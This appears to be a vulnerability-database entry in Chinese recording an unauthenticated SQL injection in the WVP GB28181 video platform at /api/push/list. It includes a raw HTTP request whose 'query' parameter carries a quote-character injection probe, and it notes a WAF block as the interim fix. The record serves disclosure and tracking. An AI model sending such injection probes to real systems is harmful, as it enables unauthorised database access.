vendor = "WVP"
name = "WVP视频平台(国标28181)未授权SQL注入漏洞"
type = "SQL注入"
version = "未知"
path = "/api/push/list"
detail = "GET /api/push/list?page=1&count=15&query=1'&pushing=&mediaServerId= HTTP/1.1 Host: Accept-Encoding: gzip, deflate, br Accept: */* Connection: close"
fix = "WAF封禁路路径，等待发布补丁"
date = "0725"
label = "1day"
